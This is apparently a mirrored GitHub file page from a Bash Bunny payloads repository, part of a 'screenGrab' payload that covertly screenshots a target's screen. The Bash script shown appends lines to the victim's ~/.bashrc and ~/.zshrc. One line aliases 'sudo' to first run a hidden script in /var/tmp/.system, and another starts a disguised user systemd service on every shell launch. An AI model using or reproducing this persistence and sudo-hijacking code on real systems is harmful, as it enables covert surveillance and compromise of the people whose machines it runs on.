mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
* uploading screenGrab screenGrab payload captures snap shots of target's screen periodically and store them into bunny. * Uploading payload
13 lines
530 B
Bash
13 lines
530 B
Bash
#!/bin/bash
|
|
ls -a ~/ | grep 'zshrc' &> /dev/null
|
|
if [ $? = 0 ]; then
|
|
echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.zshrc
|
|
echo "systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service" >> ~/.zshrc
|
|
fi
|
|
|
|
ls -a ~/ | grep 'bashrc' &> /dev/null
|
|
if [ $? = 0 ]; then
|
|
echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.bashrc
|
|
echo "systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service" >> ~/.bashrc
|
|
fi
|